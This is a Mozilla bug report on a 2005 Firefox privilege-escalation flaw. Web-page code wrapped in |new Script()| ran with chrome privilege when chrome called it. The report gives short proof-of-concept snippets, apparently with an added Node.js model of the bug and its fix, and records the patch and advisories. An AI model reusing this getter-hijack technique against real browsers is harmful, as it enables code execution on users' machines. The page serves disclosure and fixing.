Bug 289083 - |new Script()| causes arbitrary code execution
Status: RESOLVED FIXED
Whiteboard: [sg:fix]
Keywords: fixed-aviary1.0.3, fixed1.7.7
Product: Core
Classification: Components
Component: Security
Version: Trunk
Hardware: x86 Windows XP
Importance: -- normal
Target Milestone: ---
Assigned To: Daniel Veditz [:dveditz]
QA Contact:
Mentors:
Depends on: 281988
Blocks: sbb+ 289074 289187
Reported: 2005-04-05 01:03 PDT by moz_bug_r_a4
Modified: 2007-04-01 14:37 PDT
Flags:
brendan: blocking1.7.7+
brendan: blocking-aviary1.0.3+
bob: in-testsuite?
See Also:
Crash Signature:
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
testcase 1 (357 bytes, text/html), 2005-04-05 01:12 PDT, moz_bug_r_a4, no flags
testcase 2 (684 bytes, text/html), 2005-04-05 01:18 PDT, moz_bug_r_a4, no flags
testcase 3 (1009 bytes, text/html), 2005-04-05 01:23 PDT, moz_bug_r_a4, no flags
Make sure we get the right principals when dealing with JS created Scripts. (5.67 KB, patch), 2005-04-06 01:07 PDT, Johnny Stenback (:jst, jst@mozilla.com), flags: jst: review+, jst: superreview+, dbaron: approval-aviary1.0.3+, dbaron: approval1.7.7+
Same fix including the comment changes that landed on the aviary branch. (5.69 KB, patch), 2005-04-06 16:31 PDT, Johnny Stenback (:jst, jst@mozilla.com), no flags

Description moz_bug_r_a4 2005-04-05 01:03:26 PDT
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319

Even though a |Script Object| is created by a web page, when it is called
from chrome JS, it is executed with chrome privilege.

If a web page redefines the |localName| getter of a DOM node, such as the following.

  document.body.__defineGetter__("localName", function() {
    return { toLowerCase : new Script("alert(Components.stack);") };
  });

Then, if there is code such as the following in chrome JS,
"alert(Components.stack);" will be executed with chrome privilege.

  local_name = event.target.localName.toLowerCase();

In addition, |typeof new Script()| is "function" in Firefox 1.0.2 and
Mozilla 1.7.6 (it is "object" in latest-trunk), thus it is easier to write
exploit code, such as the following.

  document.body.__defineGetter__("localName", new Script("alert(Components.stack);"));

And an attacker can exploit *without* user interaction, by using the DOMLinkAdded event.


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404
Firefox/1.0+
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404


Reproducible: Always

Steps to Reproduce:
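The following is an added model in Node.js, not code from the bug report, the testcases or Gecko. It reproduces the shape of the first variant in the description (a content getter returning an object whose toLowerCase is a content-created Script, invoked by chrome) and the fix described in comment 4 (run the Script under its creator's principal). The principal objects, `withPrincipal`, `functionOf`, `makeScript` and the stand-in `Components.stack` are all assumptions of the model; Gecko's Script object and nsIPrincipal handling are not reproduced.

```javascript
// Added model (not Gecko code): why a content-created Script must run with its
// creator's principal rather than the principal of whoever calls it.

// Assumed principals, stand-ins for nsIPrincipal.
const CONTENT = { name: "http://attacker.example/", isChrome: false };
const CHROME = { name: "chrome://browser/", isChrome: true };

// Stand-in for "the principal of the currently running JS frame".
let currentPrincipal = null;

function withPrincipal(principal, fn) {
  const saved = currentPrincipal;
  currentPrincipal = principal;
  try {
    return fn();
  } finally {
    currentPrincipal = saved;
  }
}

// An ordinary function runs under the principal of the script that defined it,
// no matter who calls it. This is how content getters behave.
function functionOf(principal, fn) {
  return function (...args) {
    return withPrincipal(principal, () => fn.apply(this, args));
  };
}

// A privileged API: reading Components.stack is only allowed from chrome.
const Components = {
  get stack() {
    if (!currentPrincipal || !currentPrincipal.isChrome) {
      throw new Error("Permission denied for " +
        (currentPrincipal ? currentPrincipal.name : "no principal"));
    }
    return "chrome stack";
  },
};

// Model of |new Script(source)|; callable, as typeof reports in Firefox 1.0.2.
// fixed=false: the body runs under whatever principal is active at call time,
//              so a chrome caller lends it chrome privilege (the bug).
// fixed=true:  the body runs under the principal that created the Script.
function makeScript(source, creatorPrincipal, fixed) {
  const body = new Function("Components", source);
  return function script() {
    const subject = fixed ? creatorPrincipal : currentPrincipal;
    return withPrincipal(subject, () => body(Components));
  };
}

// The attacking page (from the description): redefine the localName getter so
// that event.target.localName.toLowerCase is a content-created Script.
function attackerPage(node, fixed) {
  const getter = functionOf(CONTENT, function () {
    // This frame is content code, so the Script is created by content.
    return { toLowerCase: makeScript("return Components.stack;", currentPrincipal, fixed) };
  });
  node.__defineGetter__("localName", getter);
}

// The chrome event handler (from the description).
function chromeHandler(node) {
  return withPrincipal(CHROME, () => node.localName.toLowerCase());
}

// Runs the scenario and reports what chrome's call produced or the error hit.
function runScenario(fixed) {
  const node = {}; // constructed stand-in for event.target
  withPrincipal(CONTENT, () => attackerPage(node, fixed));
  try {
    return { escalated: true, value: chromeHandler(node) };
  } catch (e) {
    return { escalated: false, error: e.message };
  }
}

console.log("pre-fix :", runScenario(false));
console.log("post-fix:", runScenario(true));
```

In the pre-fix run the Script body reads Components.stack because the active principal at call time is chrome's; in the post-fix run the same body is denied because the Script carries its creator's content principal. Note that the fix only removes the privilege lent to the Script; the chrome handler still calls a method on a content-controlled object, which is a separate hazard.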
Comment 1 moz_bug_r_a4 2005-04-05 01:12:36 PDT
Created attachment 179682 [details]
testcase 1

this requires the user's click action.
Comment 2 moz_bug_r_a4 2005-04-05 01:18:28 PDT
Created attachment 179683 [details]
testcase 2

this does not need user interaction.

for Firefox/1.0.2, Firefox/1.0.3, Mozilla 1.7.6, Mozilla 1.7.7
Comment 3 moz_bug_r_a4 2005-04-05 01:23:54 PDT
Created attachment 179684 [details]
testcase 3

this does not need user interaction.

for Firefox 1.0+, Mozilla 1.8b
Comment 4 Johnny Stenback (:jst, jst@mozilla.com) 2005-04-06 01:07:05 PDT
Created attachment 179827 [details] [diff] [review]
Make sure we get the right principals when dealing with JS created Scripts.

This fixes this by ensuring that we don't give elevated privileges to content
code in a Script when called from chrome. r+sr=brendan (in person).
Comment 5 Johnny Stenback (:jst, jst@mozilla.com) 2005-04-06 01:09:33 PDT
Fix landed for 1.0.3.
Comment 6 Brendan Eich [:brendan] 2005-04-06 11:04:41 PDT
Wanted in 1.7 branch and trunk, of course.

/be
Comment 7 Daniel Veditz [:dveditz] 2005-04-06 15:43:48 PDT
Comment on attachment 179827 [details] [diff] [review]
Make sure we get the right principals when dealing with JS created Scripts.

r=dveditz fwiw, though fix the missing apostrophes in the comment block.
Comment 8 Daniel Veditz [:dveditz] 2005-04-06 15:46:43 PDT
Original testcases fixed by this patch, but see bug 289074 comment 13 and the
testcase in attachment 179875 [details]
Comment 9 Johnny Stenback (:jst, jst@mozilla.com) 2005-04-06 16:31:15 PDT
Created attachment 179895 [details] [diff] [review]
Same fix including the comment changes that landed on the aviary branch.
Comment 10 Asa Dotzler [:asa] 2005-04-17 11:34:39 PDT
This still needs to land on the trunk? a=asa for trunk landing if it's simply
migrating the same patch to the trunk. Is there anything else that's needed here?
Comment 11 Asa Dotzler [:asa] 2005-04-26 15:37:02 PDT
dan says bug 281988 supersedes this. unblocking 1.8b2.
Comment 12 Juha-Matti Laurio 2005-04-29 09:48:52 PDT
This was assigned as SA14938's vulnerability #8;
http://secunia.com/advisories/14938/ and as
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1160 .
Comment 13 Juha-Matti Laurio 2005-04-29 09:51:53 PDT
Additionally, this is one of April's (i.e. 1.0.3) MFSA's classified as 'Critical':
http://www.mozilla.org/security/announce/mfsa2005-41.html
Comment 14 Daniel Veditz [:dveditz] 2005-05-17 16:21:52 PDT
This has been landed on the trunk as part of bug 281988. Although parts of
281988 have been backed out, this much remains.
